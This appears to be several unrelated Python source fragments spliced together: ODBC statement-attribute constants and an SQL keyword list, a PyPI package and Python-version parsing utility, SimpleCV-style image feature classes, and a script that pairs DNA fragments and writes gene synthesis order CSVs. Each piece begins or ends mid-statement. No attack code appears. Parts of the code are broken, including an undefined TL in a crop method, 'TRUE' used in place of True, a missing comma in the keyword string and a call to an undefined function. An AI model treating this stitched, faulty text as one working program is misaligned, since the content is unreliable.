self.SQL_PARAM_BIND_TYPE_DEFAULT = self.SQL_PARAM_BIND_BY_COLUMN
################################################################################
####SQLGetStmtAttr - SQL_BIND_TYPE##############################################
################################################################################
self.SQL_BIND_BY_COLUMN = 0
self.SQL_BIND_TYPE_DEFAULT = self.SQL_BIND_BY_COLUMN
################################################################################
####SQLGetStmtAttr - SQL_CONCURRENCY############################################
################################################################################
self.SQL_CONCUR_READ_ONLY = 1
self.SQL_CONCUR_LOCK = 2
self.SQL_CONCUR_ROWVER = 3
self.SQL_CONCUR_VALUES = 4
self.SQL_CONCUR_DEFAULT = self.SQL_CONCUR_READ_ONLY
################################################################################
####SQLGetStmtAttr - SQL_CURSOR_TYPE############################################
################################################################################
self.SQL_CURSOR_FORWARD_ONLY = 0
self.SQL_CURSOR_KEYSET_DRIVEN = 1
self.SQL_CURSOR_DYNAMIC = 2
self.SQL_CURSOR_STATIC = 3
self.SQL_CURSOR_TYPE_DEFAULT = self.SQL_CURSOR_FORWARD_ONLY
################################################################################
####SQLGetStmtAttr - SQL_KEYSET_SIZE############################################
################################################################################
self.SQL_KEYSET_SIZE_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_MAX_LENGTH#############################################
################################################################################
self.SQL_MAX_LENGTH_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_MAX_ROWS###############################################
################################################################################
self.SQL_MAX_ROWS_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_NOSCAN#################################################
################################################################################
self.SQL_NOSCAN_OFF = 0
self.SQL_NOSCAN_ON = 1
self.SQL_NOSCAN_DEFAULT = self.SQL_NOSCAN_OFF
################################################################################
####SQLGetStmtAttr - SQL_QUERY_TIMEOUT##########################################
################################################################################
self.SQL_QUERY_TIMEOUT_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_RETRIEVE_DATA##########################################
################################################################################
self.SQL_RD_OFF = 0
self.SQL_RD_ON = 1
self.SQL_RD_DEFAULT = self.SQL_RD_ON
################################################################################
####SQLGetStmtAttr - SQL_ROWSET_SIZE############################################
################################################################################
self.SQL_ROWSET_SIZE_DEFAULT = 1
################################################################################
####SQLGetStmtAttr - SQL_SIMULATE_CURSOR########################################
################################################################################
self.SQL_SC_NON_UNIQUE = 0
self.SQL_SC_TRY_UNIQUE = 1
self.SQL_SC_UNIQUE = 2
################################################################################
####SQLGetStmtAttr - SQL_USE_BOOKMARKS##########################################
################################################################################
self.SQL_UB_OFF = 0
self.SQL_UB_ON = 1
self.SQL_UB_DEFAULT = self.SQL_UB_OFF
self.SQL_UB_FIXED = self.SQL_UB_ON
self.SQL_UB_VARIABLE = 2
################################################################################
####SQLGetTypeInfo - SEARCHABLE#################################################
################################################################################
self.SQL_COL_PRED_CHAR = self.SQL_LIKE_ONLY
self.SQL_COL_PRED_BASIC = self.SQL_ALL_EXCEPT_LIKE
################################################################################
####SQLSetPos###################################################################
################################################################################
self.SQL_ENTIRE_ROWSET = 0
################################################################################
####SQLSetPos - Operation#######################################################
################################################################################
self.SQL_POSITION = 0
self.SQL_REFRESH = 1
self.SQL_UPDATE = 2
self.SQL_DELETE = 3
################################################################################
####SQLBulkOperations - Operation###############################################
################################################################################
self.SQL_ADD = 4
self.SQL_SETPOS_MAX_OPTION_VALUE = self.SQL_ADD
self.SQL_UPDATE_BY_BOOKMARK = 5
self.SQL_DELETE_BY_BOOKMARK = 6
self.SQL_FETCH_BY_BOOKMARK = 7
################################################################################
####SQLSetPos - LockType########################################################
################################################################################
self.SQL_LOCK_NO_CHANGE = 0
self.SQL_LOCK_EXCLUSIVE = 1
self.SQL_LOCK_UNLOCK = 2
self.SQL_SETPOS_MAX_LOCK_VALUE = self.SQL_LOCK_UNLOCK
################################################################################
####SQLSetPos macros############################################################
################################################################################
#TODO: Map self.SQLSetPos macros
self.SQL_POSITION_TO = self.UnimplementedSQLFunction
self.SQL_LOCK_RECORD = self.UnimplementedSQLFunction
self.SQL_REFRESH_RECORD = self.UnimplementedSQLFunction
self.SQL_UPDATE_RECORD = self.UnimplementedSQLFunction
self.SQL_DELETE_RECORD = self.UnimplementedSQLFunction
self.SQL_ADD_RECORD = self.UnimplementedSQLFunction
################################################################################
####SQLSpecialColumns - Column types and scopes#################################
################################################################################
self.SQL_BEST_ROWID = 1
self.SQL_ROWVER = 2
################################################################################
####All the ODBC keywords#######################################################
################################################################################
self.SQL_ODBC_KEYWORDS = ("ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,"
"ASC,ASSERTION,AT,AUTHORIZATION,AVG,"
"BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,"
"CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,"
"COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,"
"CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,"
"CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,"
"DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,"
"DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,"
"DISTINCT,DOMAIN,DOUBLE,DROP,"
"ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,"
"EXISTS,EXTERNAL,EXTRACT,"
"FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,"
"GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,"
"IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,"
"INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,"
"JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,"
"MATCH,MAX,MIN,MINUTE,MODULE,MONTH,"
"NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,"
"OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,"
"PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,"
"PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,"
"READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWS"
"SCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,"
"SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,"
"SUBSTRING,SUM,SYSTEM_USER,"
"TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,"
"TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,"
"UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,"
"VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,"
"YEAR,ZONE")
################################################################################
####Level 2 | |
import json
import os
import re
import sys
from collections import defaultdict
from runez.file import ls_dir, parent_folder, to_path
from runez.http import RestClient, urljoin
from runez.program import is_executable, run
from runez.system import _R, abort, cached_property, flattened, joined, ltattr, resolved_path, short, stringified, UNSET
CPYTHON = "cpython"
PYTHON_FAMILIES = (CPYTHON, "pypy", "conda")
R_FAMILY = re.compile(r"^([a-z]+\d?)[:-]?$")
R_SPEC = re.compile(r"^([a-z][a-z\d]*?)?([:-])?(\d[^:-]*)$", re.IGNORECASE)
R_VERSION = re.compile(r"v?((\d+!)?(\d+)((\.(\d+))*)((a|b|c|rc)(\d+))?(\.(dev|post|final)\.?(\d+))?(\+[\w.-]*)?)(.*)")
def get_current_version(components=3):
return Version(".".join(str(s) for s in sys.version_info[:components]))
def guess_family(text):
"""
Args:
text (str | None): Text to examine
Returns:
(str): Guessed python family from given 'text' (typically path to installation)
"""
if text:
if text in ("p", "py", "python"):
return CPYTHON
m = R_FAMILY.match(text)
if m:
return m.group(1)
for name in PYTHON_FAMILIES:
if name in text:
return name
return CPYTHON
class ArtifactInfo:
"""Info extracted from a typical python build artifact basename"""
def __init__(self, basename, package_name, version, is_wheel=False, source=None, tags=None, wheel_build_number=None):
"""
Args:
basename (str): Basename of artifact
package_name (str): Package name, may not be completely standard
version (Version): Package version
is_wheel (bool): Is this artifact a wheel?
source: Optional arbitrary object to track provenance of ArtifactInfo
tags (str | None): Wheel tags, if any
wheel_build_number (str | None): Wheel build number, if any
"""
self.basename = basename
self.package_name = package_name
self.version = version
self.is_wheel = is_wheel
self.source = source
self.tags = tags
self.wheel_build_number = wheel_build_number
self.pypi_name = PypiStd.std_package_name(package_name)
self.relative_url = "%s/%s" % (self.pypi_name, basename)
@classmethod
def from_basename(cls, basename, source=None):
"""
Args:
basename (str): Basename to parse
source: Optional arbitrary object to track provenance of ArtifactInfo
Returns:
(ArtifactInfo | None): Parsed artifact info, if any
"""
is_wheel = wheel_build_number = tags = None
m = PypiStd.RX_SDIST.match(basename)
if not m:
m = PypiStd.RX_WHEEL.match(basename)
if not m:
return None
wheel_build_number = m.group(4)
tags = m.group(5)
is_wheel = True
# RX_SDIST and RX_WHEEL both yield package_name and version as match groups 1 and 2
version = Version(m.group(2))
return cls(basename, m.group(1), version, is_wheel=is_wheel, source=source, tags=tags, wheel_build_number=wheel_build_number)
def __repr__(self):
return self.relative_url or self.basename
def __eq__(self, other):
return isinstance(other, ArtifactInfo) and self.basename == other.basename
def __lt__(self, other):
"""Ordered by source, then pypi_name, then version, then category"""
return ltattr(self, other, "source", "pypi_name", "version", "category", t=ArtifactInfo)
@property
def category(self):
return "wheel" if self.is_wheel else "source distribution"
@property
def is_dirty(self):
return not self.version or "dirty" in self.version.text
class PypiStd:
"""
Check/standardize pypi package names
More strict than actual pypi (for example: names starting with a number are not considered value)
"""
RX_ACCEPTABLE_PACKAGE_NAME = re.compile(r"^[a-z][\w.-]*[a-z\d]$", re.IGNORECASE)
RR_PYPI = re.compile(r"([^a-z\d-]+|--+)", re.IGNORECASE)
RR_WHEEL = re.compile(r"[^a-z\d.]+", re.IGNORECASE)
RX_HREF = re.compile(r'href=".+/([^/#]+\.(tar\.gz|whl))#', re.IGNORECASE)
RX_SDIST = re.compile(r"^([a-z][\w.-]*[a-z\d])-(\d[\w.!+-]*)\.tar\.gz$", re.IGNORECASE)
RX_WHEEL = re.compile(r"^([a-z][\w.]*[a-z\d])-(\d[\w.!+]*)(-(\d[\w.]*))?-(.*)\.whl$", re.IGNORECASE)
DEFAULT_PYPI_URL = "https://pypi.org/pypi/{name}/json"
_pypi_client = None
@classmethod
def is_acceptable(cls, name):
"""Is 'name' an acceptable pypi package name?"""
return bool(isinstance(name, str) and name != "UNKNOWN" and cls.RX_ACCEPTABLE_PACKAGE_NAME.match(name))
@classmethod
def std_package_name(cls, name):
"""Standardized pypi package name, single dashes and alpha numeric chars allowed only"""
if cls.is_acceptable(name):
dashed = cls.RR_PYPI.sub("-", name).lower()
return cls.RR_PYPI.sub("-", dashed) # 2nd pass to ensure no `--` remains
@classmethod
def std_wheel_basename(cls, name):
"""Standardized wheel file base name, single underscores, dots and alpha numeric chars only"""
if cls.is_acceptable(name):
return cls.RR_WHEEL.sub("_", name)
@classmethod
def default_pypi_client(cls):
"""
Returns:
(RestClient): Default client to use to query pypi
"""
if cls._pypi_client is None:
cls._pypi_client = RestClient()
return cls._pypi_client
@classmethod
def pypi_response(cls, package_name, client=None, index=None, fatal=False, logger=False):
"""See https://warehouse.pypa.io/api-reference/json/
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(dict | str | None): Dict if we queried actual REST endpoint, html text otherwise (legacy pypi simple)
"""
pypi_name = cls.std_package_name(package_name)
if not pypi_name:
return None
if client:
if not index:
index = client.base_url
else:
client = cls.default_pypi_client()
if not index:
index = cls.DEFAULT_PYPI_URL
if "{name}" in index:
url = index.format(name=pypi_name)
else:
url = urljoin(index, "%s/" % pypi_name)
r = client.get_response(url, fatal=fatal, logger=logger)
if r and r.ok:
text = (r.text or "").strip()
if text.startswith("{"):
return json.loads(text)
return text
@classmethod
def latest_pypi_version(cls, package_name, client=None, index=None, include_prerelease=False, fatal=False, logger=False):
"""
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
include_prerelease (bool): If True, include pre-releases
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(Version | None): Latest version, if any
"""
response = cls.pypi_response(package_name, client=client, index=index, fatal=fatal, logger=logger)
if response:
if isinstance(response, dict):
info = response.get("info")
if isinstance(info, dict) and not info.get("yanked"): # Not sure if this can ever happen
version = Version(info.get("version"))
if version.is_valid and (include_prerelease or not version.prerelease):
return version
versions = sorted(x.version for x in cls._versions_from_pypi(response.get("releases")))
else:
versions = sorted(i.version for i in cls._parsed_legacy_html(response))
if not include_prerelease:
candidates = [v for v in versions if v.is_valid and not v.prerelease]
if candidates:
versions = candidates
if versions:
return versions[-1]
@classmethod
def ls_pypi(cls, package_name, client=None, index=None, source=None, fatal=False, logger=False):
"""
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
source: Optional arbitrary object to track provenance of ArtifactInfo
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(list[ArtifactInfo] | None): Artifacts reported by pypi mirror
"""
response = cls.pypi_response(package_name, client=client, index=index, fatal=fatal, logger=logger)
if isinstance(response, dict):
yield from cls._versions_from_pypi(response.get("releases"), source=source)
elif response:
yield from cls._parsed_legacy_html(response, source=source)
@classmethod
def _versions_from_pypi(cls, releases, source=None):
if isinstance(releases, dict):
for v, infos in releases.items():
for info in infos:
if not info.get("yanked"):
info = ArtifactInfo.from_basename(info.get("filename"), source=source)
if info:
yield info
@classmethod
def _parsed_legacy_html(cls, text, source=None):
"""
Args:
text (str): Text as received from a legacy pypi server
source: Optional arbitrary object to track provenance of ArtifactInfo
Yields:
(ArtifactInfo): Extracted information
"""
if text:
lines = text.strip().splitlines()
if lines and "does not exist" not in lines[0]:
for line in lines:
m = cls.RX_HREF.search(line)
if m:
info = ArtifactInfo.from_basename(m.group(1), source=source)
if info:
yield info
class PythonSpec:
"""
Holds a canonical reference to a desired python installation
Examples: 3, 3.9, py39, conda3.7.1, /usr/bin/python
Scanned pythons have a full spec of the form: 'cpython:3.9.2'
Desired pythons are typically partial (like: 'py39', turned into canonical 'cpython:3.9')
`PythonDepot` can then search for pythons satisfying the partial specs given
"""
family = None
is_min_spec = ""
version = None
def __init__(self, text, family=None):
"""
Args:
text: Text describing desired python (note: an empty or None `text` will yield a generic "cpython:" spec)
family (str | None): Additional text to examine to determine python family
"""
text = stringified(text, none="").strip()
self.text = text
if not text or text == "invoker":
self.family = guess_family(family or sys.version)
self.canonical = "invoker"
self.version = get_current_version()
return
if _is_path(text):
self.family = guess_family(family or text)
self.canonical = resolved_path(text)
return
m = R_SPEC.match(text)
if not m:
m = R_FAMILY.match(text)
if m:
self.family = guess_family(family or m.group(1))
self.canonical = "%s:" % self.family
else:
self.canonical = "?%s" % text
return
version_text = m.group(3)
if version_text and version_text.endswith("+"):
self.is_min_spec = "+"
version_text = version_text[:-1]
if version_text:
if len(version_text) > 1 and "." not in version_text:
version_text = "%s.%s" % (version_text[0], version_text[1:])
self.version = Version.from_text(version_text, strict=True)
if self.version:
self.family = guess_family(family or m.group(1))
self.canonical = "%s:%s%s" % (self.family, self.version or "", self.is_min_spec)
else:
self.canonical = "?%s" % text
def __repr__(self):
return short(self.canonical)
def __hash__(self):
return hash(self.canonical)
def __eq__(self, other):
return isinstance(other, PythonSpec) and self.canonical == other.canonical
def __lt__(self, other):
if isinstance(other, PythonSpec):
if self.version is None or other.version | |
the feature.
**EXAMPLE**
>>> img = Image("lenna")
>>> kp = img.findKeypoints()
>>> c = kp[0].meanColor()
"""
#generate the mask
if( self._avgColor is None):
mask = self.image.getEmpty(1)
cv.Zero(mask)
cv.Circle(mask,(int(self.x),int(self.y)),int(self._r),color=(255,255,255),thickness=-1)
temp = cv.Avg(self.image.getBitmap(),mask)
self._avgColor = (temp[0],temp[1],temp[2])
return self._avgColor
def colorDistance(self, color = (0, 0, 0)):
"""
Return the euclidean color distance of the color tuple at x,y from a given color (default black)
"""
return spsd.euclidean(np.array(color), np.array(self.meanColor()))
def perimeter(self):
"""
**SUMMARY**
Returns the perimeter of the circle feature in pixels.
"""
return 2*pi*self._r
def width(self):
"""
**SUMMARY**
Returns the width of the feature -- for compliance just r*2
"""
return self._r*2
def height(self):
"""
**SUMMARY**
Returns the height of the feature -- for compliance just r*2
"""
return self._r*2
def radius(self):
"""
**SUMMARY**
Returns the radius of the circle in pixels.
"""
return self._r
def diameter(self):
"""
**SUMMARY**
Returns the diameter of the circle in pixels.
"""
return self._r*2
def crop(self,noMask=False):
"""
**SUMMARY**
This function returns the largest bounding box for an image.
**PARAMETERS**
* *noMask* - if noMask=True we return the bounding box image of the circle.
if noMask=False (default) we return the masked circle with the rest of the area set to black
**RETURNS**
The masked circle image.
"""
if( noMask ):
return self.image.crop(self.x, self.y, self.width(), self.height(), centered = True)
else:
mask = self.image.getEmpty(1)
result = self.image.getEmpty()
cv.Zero(mask)
cv.Zero(result)
#if you want to shave a bit of time we go do the crop before the blit
cv.Circle(mask,(int(self.x),int(self.y)),int(self._r),color=(255,255,255),thickness=-1)
cv.Copy(self.image.getBitmap(),result,mask)
retVal = Image(result)
retVal = retVal.crop(self.x, self.y, self.width(), self.height(), centered = True)
return retVal
######################################################################
class Motion(Feature):
"""
**SUMMARY**
The motion feature is used to encapsulate optical flow vectors. The feature
holds the length and direction of the vector.
"""
x = 0.0
y = 0.0
image = "" #parent image
points = []
dx = 0.00
dy = 0.00
norm_dy = 0.00
norm_dx = 0.00
window = 7
def __init__(self, i, at_x, at_y,dx,dy,wndw):
"""
i - the source image.
at_x - the sample x pixel position on the image.
at_y - the sample y pixel position on the image.
dx - the x component of the optical flow vector.
dy - the y component of the optical flow vector.
wndw - the size of the sample window (we assume it is square).
"""
self.dx = dx # the direction of the vector
self.dy = dy
self.window = wndw # the size of the sample window
sz = wndw/2
# so we center at the flow vector
points = [(at_x+sz,at_y+sz),(at_x-sz,at_y+sz),(at_x+sz,at_y+sz),(at_x+sz,at_y-sz)]
super(Motion, self).__init__(i, at_x, at_y, points)
def draw(self, color = Color.GREEN, width=1,normalize=True):
"""
**SUMMARY**
Draw the optical flow vector going from the sample point along the length of the motion vector.
**PARAMETERS**
* *color* - An RGB color triplet.
* *width* - if width is less than zero we draw the feature filled in, otherwise we draw the
contour using the specified width.
* *normalize* - normalize the vector size to the size of the block (i.e. the biggest optical flow
vector is scaled to the size of the block, all other vectors are scaled relative to
the longest vector.
**RETURNS**
Nothing - this is an inplace operation that modifies the source images drawing layer.
"""
new_x = 0
new_y = 0
if( normalize ):
win = self.window/2
w = math.sqrt((win*win)*2)
new_x = (self.norm_dx*w) + self.x
new_y = (self.norm_dy*w) + self.y
else:
new_x = self.x + self.dx
new_y = self.y + self.dy
self.image.dl().line((self.x,self.y),(new_x,new_y),color,width)
def normalizeTo(self, max_mag):
"""
**SUMMARY**
This helper method normalizes the vector give an input magnitude.
This is helpful for keeping the flow vector inside the sample window.
"""
if( max_mag == 0 ):
self.norm_dx = 0
self.norm_dy = 0
return None
mag = self.magnitude()
new_mag = mag/max_mag
unit = self.unitVector()
self.norm_dx = unit[0]*new_mag
self.norm_dy = unit[1]*new_mag
def magnitude(self):
"""
Returns the magnitude of the optical flow vector.
"""
return sqrt((self.dx*self.dx)+(self.dy*self.dy))
def unitVector(self):
"""
Returns the unit vector direction of the flow vector as an (x,y) tuple.
"""
mag = self.magnitude()
if( mag != 0.00 ):
return (float(self.dx)/mag,float(self.dy)/mag)
else:
return (0.00,0.00)
def vector(self):
"""
Returns the raw direction vector as an (x,y) tuple.
"""
return (self.dx,self.dy)
def windowSz(self):
"""
Return the window size that we sampled over.
"""
return self.window
def meanColor(self):
"""
Return the color tuple from x,y
**SUMMARY**
Return a numpy array of the average color of the area covered by each Feature.
**RETURNS**
Returns an array of RGB triplets the correspond to the mean color of the feature.
**EXAMPLE**
>>> img = Image("lenna")
>>> kp = img.findKeypoints()
>>> c = kp.meanColor()
"""
x = int(self.x-(self.window/2))
y = int(self.y-(self.window/2))
return self.image.crop(x,y,int(self.window),int(self.window)).meanColor()
def crop(self):
"""
This function returns the image in the sample window around the flow vector.
Returns Image
"""
x = int(self.x-(self.window/2))
y = int(self.y-(self.window/2))
return self.image.crop(x,y,int(self.window),int(self.window))
######################################################################
class KeypointMatch(Feature):
"""
This class encapsulates a keypoint match between images of an object.
It is used to record a template of one image as it appears in another image
"""
x = 0.00
y = 0.00
image = "" #parent image
points = []
_minRect = []
_avgColor = None
_homography = []
_template = None
def __init__(self, image,template,minRect,_homography):
self._template = template
self._minRect = minRect
self._homography = _homography
xmax = 0
ymax = 0
xmin = image.width
ymin = image.height
for p in minRect:
if( p[0] > xmax ):
xmax = p[0]
if( p[0] < xmin ):
xmin = p[0]
if( p[1] > ymax ):
ymax = p[1]
if( p[1] < ymin ):
ymin = p[1]
width = (xmax-xmin)
height = (ymax-ymin)
at_x = xmin + (width/2)
at_y = ymin + (height/2)
#self.x = at_x
#self.y = at_y
points = [(xmin,ymin),(xmin,ymax),(xmax,ymax),(xmax,ymin)]
#self._updateExtents()
#self.image = image
#points =
super(KeypointMatch, self).__init__(image, at_x, at_y, points)
def draw(self, color = Color.GREEN,width=1):
"""
The default drawing operation is to draw the min bounding
rectangle in an image.
**SUMMARY**
Draw a small circle around the corner. Color tuple is single parameter, default is Red.
**PARAMETERS**
* *color* - An RGB color triplet.
* *width* - if width is less than zero we draw the feature filled in, otherwise we draw the
contour using the specified width.
**RETURNS**
Nothing - this is an inplace operation that modifies the source images drawing layer.
"""
self.image.dl().line(self._minRect[0],self._minRect[1],color,width)
self.image.dl().line(self._minRect[1],self._minRect[2],color,width)
self.image.dl().line(self._minRect[2],self._minRect[3],color,width)
self.image.dl().line(self._minRect[3],self._minRect[0],color,width)
def drawRect(self, color = Color.GREEN,width=1):
"""
This method draws the axes alligned square box of the template
match. This box holds the minimum bounding rectangle that describes
the object. If the minimum bounding rectangle is axes aligned
then the two bounding rectangles will match.
"""
self.image.dl().line(self.points[0],self.points[1],color,width)
self.image.dl().line(self.points[1],self.points[2],color,width)
self.image.dl().line(self.points[2],self.points[3],color,width)
self.image.dl().line(self.points[3],self.points[0],color,width)
def crop(self):
"""
Returns a cropped image of the feature match. This cropped version is the
axes aligned box masked to just include the image data of the minimum bounding
rectangle.
"""
raw = self.image.crop(TL[0],TL[1],self.width(),self.height()) # crop the minbouding rect
return raw
def meanColor(self):
"""
return the average color within the circle
**SUMMARY**
Return a numpy array of the average color of the area covered by each Feature.
**RETURNS**
Returns an array of RGB triplets the correspond to the mean color of the feature.
**EXAMPLE**
>>> img = Image("lenna")
>>> kp = img.findKeypoints()
>>> c = kp.meanColor()
"""
if( self._avgColor is None ):
TL = self.topLeftCorner()
raw = self.image.crop(TL[0],TL[0],self.width(),self.height()) # crop the minbouding rect
mask = Image((self.width(),self.height()))
mask.dl().polygon(self._minRect,color=Color.WHITE,filled=TRUE)
mask = mask.applyLayers()
retVal = cv.Avg(raw.getBitmap(),mask._getGrayscaleBitmap())
self._avgColor = retVal
else:
retVal = self._avgColor
return retVal
def getMinRect(self):
"""
Returns the minimum bounding rectangle of the feature as a list
of (x,y) tuples.
"""
return self._minRect
def getHomography(self):
"""
Returns the _homography matrix used to calulate the minimum bounding
rectangle.
"""
return self._homography
######################################################################
"""
Create a shape context descriptor.
"""
class ShapeContextDescriptor(Feature):
x = 0.00
y = 0.00
image = "" #parent image
points = []
_minRect = []
_avgColor = None
_descriptor = None
_sourceBlob = None
def __init__(self, image,point,descriptor,blob):
self._descriptor = descriptor
self._sourceBlob = blob
x = point[0]
y | |
data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BtgZI":
ortho_pair = get_pair(data["gene_id"])
fragments = FG_standard_fragment(data["sequence"]["optimized_sequence"],part_type,data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"], ortho_pair)
print(fragments)
print(data["gene_id"])
gene_id = data["gene_id"]
for index,frag in enumerate(fragments):
fragment_name = gene_id + "_" + str(index + 1)
data["sequence"]["fragment_sequences"][fragment_name] = frag
path = "{}{}".format(stage,gene_id)
with open("{}/{}.json".format(path,gene_id),"w+") as json_file:
json.dump(data,json_file,indent=2)
def order_write_link():
for file in glob.glob(stage + "*/*.json"):
with open(file,"r") as json_file:
data = json.load(json_file)
# Fragment the genes
# Begin query
if data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BtgZI":
small_seq_ids.append(data["gene_id"])
small_seqs.append(data["sequence"]["fragment_sequences"]["{}_1".format(data["gene_id"])])
elif data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BbsI":
print("Num frags: ",len(data["sequence"]["fragment_sequences"]))
if len(data["sequence"]["fragment_sequences"]) > 1:
print("too many frags")
continue
large_seq_ids.append(data["gene_id"])
large_seqs.append(data["sequence"]["fragment_sequences"]["{}_1".format(data["gene_id"])])
# Generate dataframes that are sorted in opposite directions based on length
# which pairs the smallest large fragment with the largest small fragment
small_df = pd.DataFrame({
"Gene ID" : small_seq_ids,
"Sequence" : small_seqs,
"Length" : [len(seq) for seq in small_seqs]
})
small_df = small_df.sort_values("Length",ascending=False)
large_df = pd.DataFrame({
"Gene ID" : large_seq_ids,
"Sequence" : large_seqs,
"Length" : [len(seq) for seq in large_seqs]
})
large_df = large_df.sort_values("Length")
small_counter = 0
print("Total small sequences: ",len(small_df))
## ====================================================
## Join Fragments
## ====================================================
joined_seqs = []
joined_ids = []
fragment_names = []
# Pair sequences together until it runs out of either type of sequence
for index,row in large_df.iterrows():
print("small counter: ",small_counter)
if len(small_df) == small_counter:
print("ran out of small")
break
small_row = small_df.iloc[small_counter]
if repeat_check(row["Sequence"] + small_row["Sequence"]):
joined_seq = row["Sequence"] + small_row["Sequence"]
joined_ids.append(row["Gene ID"])
joined_seqs.append(joined_seq)
fragment_names.append(row["Gene ID"] + "_link_" + small_row["Gene ID"])
joined_ids.append(small_row["Gene ID"])
joined_seqs.append(joined_seq)
fragment_names.append(row["Gene ID"] + "_link_" + small_row["Gene ID"])
small_counter += 1
else:
print(row["Gene ID"] + " AND " + small_row["Gene ID"])
joined_df = pd.DataFrame({
"Gene ID" : joined_ids,
"Sequence" : joined_seqs,
"Fragment Name" : fragment_names
})
# Change the files in the database to reflect the joined sequences
for index,row in joined_df.iterrows():
with open("{}{}/{}.json".format(stage,row["Gene ID"],row["Gene ID"]),"r") as json_file:
data = json.load(json_file)
data["sequence"]["fragment_sequences"] = {}
data["sequence"]["fragment_sequences"][row["Fragment Name"]] = row["Sequence"]
with open("{}{}/{}.json".format(stage,row["Gene ID"],row["Gene ID"]),"w+") as json_file:
json.dump(data,json_file,indent=2)
def order_twist_order():
next_sub_num = input("Next submission number : ")
## Find all of the sequences that have yet to be ordered
will_order = []
will_order_seqs = []
for file in glob.glob("{}*/*.json".format(stage)):
with open(file,"r") as json_file:
data = json.load(json_file)
# Excludes sequences that have already been ordered and small sequences
# that haven't been paired yet
#if data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BtgZI":
#continue
# Only pulls the sequence to order from the large fragment
if data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BbsI":
for fragment in data["sequence"]["fragment_sequences"]:
print("fragment",fragment)
will_order.append(fragment)
will_order_seqs.append(data["sequence"]["fragment_sequences"][fragment])
data["info"]["order_number"] = int(next_sub_num)
with open(file,"w+") as json_file:
json.dump(data,json_file,indent=2)
# Output DNA in Twist order format
twist_dna = pd.DataFrame({
'gene name': will_order,
'FASTA_seq': will_order_seqs,
}, columns=['gene name','FASTA_seq'])
previous_submissions = (sorted(glob.glob("./.." + "/submissions/*.csv")))
twist_dna.to_csv('{}/submissions/submission{}.csv'.format("./..",str(next_sub_num).zfill(3)),index=False)
print("Completed submission form.")
def order_replace_bad_sequence(gene_id):
table = codon.load_codon_table(taxonomy_id="custom_1", custom=True)
json_data = Json_load(stage + "{}/{}.json".format(gene_id,gene_id))
seq_to_replace = input("Sequence to replace? ")
new_seq = input("New sequence? ")
old_sequence = json_data["sequence"]["optimized_sequence"]
new_sequence = fix_sequence(table,gene_id,old_sequence.replace(seq_to_replace, new_seq),0,[])
if not Seq(old_sequence, IUPAC.unambiguous_dna).translate() == Seq(new_sequence, IUPAC.unambiguous_dna).translate():
print("Bad translation, try again")
replace_bad_sequence(gene_id)
else:
with open(stage + "{}/{}.gb".format(gene_id,gene_id),"r") as genbank_single:
genbank_current = genbank_single.read()
genbank_fixed = replace_genbank_sequence(genbank_current, new_sequence)
with open(stage + "{}/{}.gb".format(gene_id,gene_id),"w+") as genbank_single:
